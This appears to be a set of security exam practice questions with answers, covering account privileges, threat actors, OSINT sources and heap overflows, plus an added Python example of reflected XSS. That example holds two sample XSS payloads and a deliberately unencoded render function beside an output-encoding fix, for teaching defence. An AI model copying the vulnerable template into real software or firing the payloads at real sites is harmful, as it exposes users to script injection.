A security analyst discovers that unauthorized privileges have been granted to a new account that was created with high-level access, which was not authorized by the security team. Which of the following is the most effective way to prevent the introduction of new accounts with unauthorized privileges in an organization's environment?

Implement strict controls on account creation and privilege assignment

A group of individuals with little to no technical skills has hit a company's website by launching a barrage of cyberattacks. They used pre-packaged tools downloaded from the internet to launch attacks on the company's website servers. What type of threat actor group is this?

Script kiddies

A financial institution is preparing to implement a vulnerability management program to enhance its cybersecurity posture. As part of this process, the organization evaluates potential vulnerability management reporting and communication inhibitors. Within this context, why could a memorandum of understanding (MOU) between the financial institution and a third-party vendor be a common inhibitor to effective vulnerability management reporting and communication? (Select the two best options.)

An MOU may not clearly define the roles and responsibilities of each party for vulnerability management. An MOU may include restrictions on sharing information about vulnerabilities.

A web administrator is responsible for the security of a web application. The administrator wants to prevent cross-site scripting (XSS) attacks where user input is reflected back and executed as part of the web page content. Which of the following best practices should the administrator use to achieve this goal?

Output encoding
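The reflected-XSS item above, as an added example that is not from the original study set: a results page that interpolates the query string straight into HTML body and attribute contexts, beside the same page with the input encoded for those contexts. The template, the two payloads and the helper names are constructed for illustration.

```python
"""Reflected XSS: unencoded interpolation beside context-appropriate output
encoding. Added example; the page template and inputs are constructed."""
import html

# Constructed payloads: one opens a tag in the body, one breaks out of an attribute.
ATTACK_BODY = "<script>alert(document.cookie)</script>"
ATTACK_ATTR = '" autofocus onfocus="alert(1)'


def render_vulnerable(query: str) -> str:
    """User input dropped straight into HTML body and attribute contexts."""
    return (f"<p>Results for {query}</p>\n"
            f'<input name="q" value="{query}">')


def render_encoded(query: str) -> str:
    """html.escape(quote=True) encodes & < > and both quote characters, so the
    input can neither open a tag in the body nor close the attribute and append
    an event handler. This covers HTML body and quoted-attribute contexts only;
    a JavaScript or URL context needs its own encoder."""
    safe = html.escape(query, quote=True)
    return (f"<p>Results for {safe}</p>\n"
            f'<input name="q" value="{safe}">')


def tag_or_handler_injected(page: str) -> bool:
    """Crude check for the two outcomes the encoding is meant to prevent."""
    lowered = page.lower()
    return "<script" in lowered or 'onfocus="alert' in lowered
```

Encoding at output time, in the template, is preferred over stripping at input time: the same value is often rendered in several contexts, and the encoder for each context is chosen where the value is emitted.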

A company's cyber security team is responsible for protecting its network against cyber threats. The team wants to gather open-source intelligence (OSINT) on potential threats to the company. Which of the following is a source the team can use to achieve this requirement?

Government bulletins

A cyber security specialist, responsible for threat intelligence and threat hunting in an organization, is looking to collect open-source intelligence (OSINT). The specialist wants to gather intelligence on potential cyber threats. Which sources should the cyber security specialist consider to achieve this information? (Select the two best options.)

Social media profiles; HTML code of an organization's web page

A web application that allows users to upload images to their profile has a security vulnerability. An attacker can upload a specially crafted image, causing the web application to try to write data beyond the end of a dynamically allocated portion of memory allocated at run time. The application does not properly handle the overflow, allowing the attacker to execute arbitrary code on the server. What type of vulnerability does this situation describe? (Select the two best options.)

Heap overflow; buffer overflow

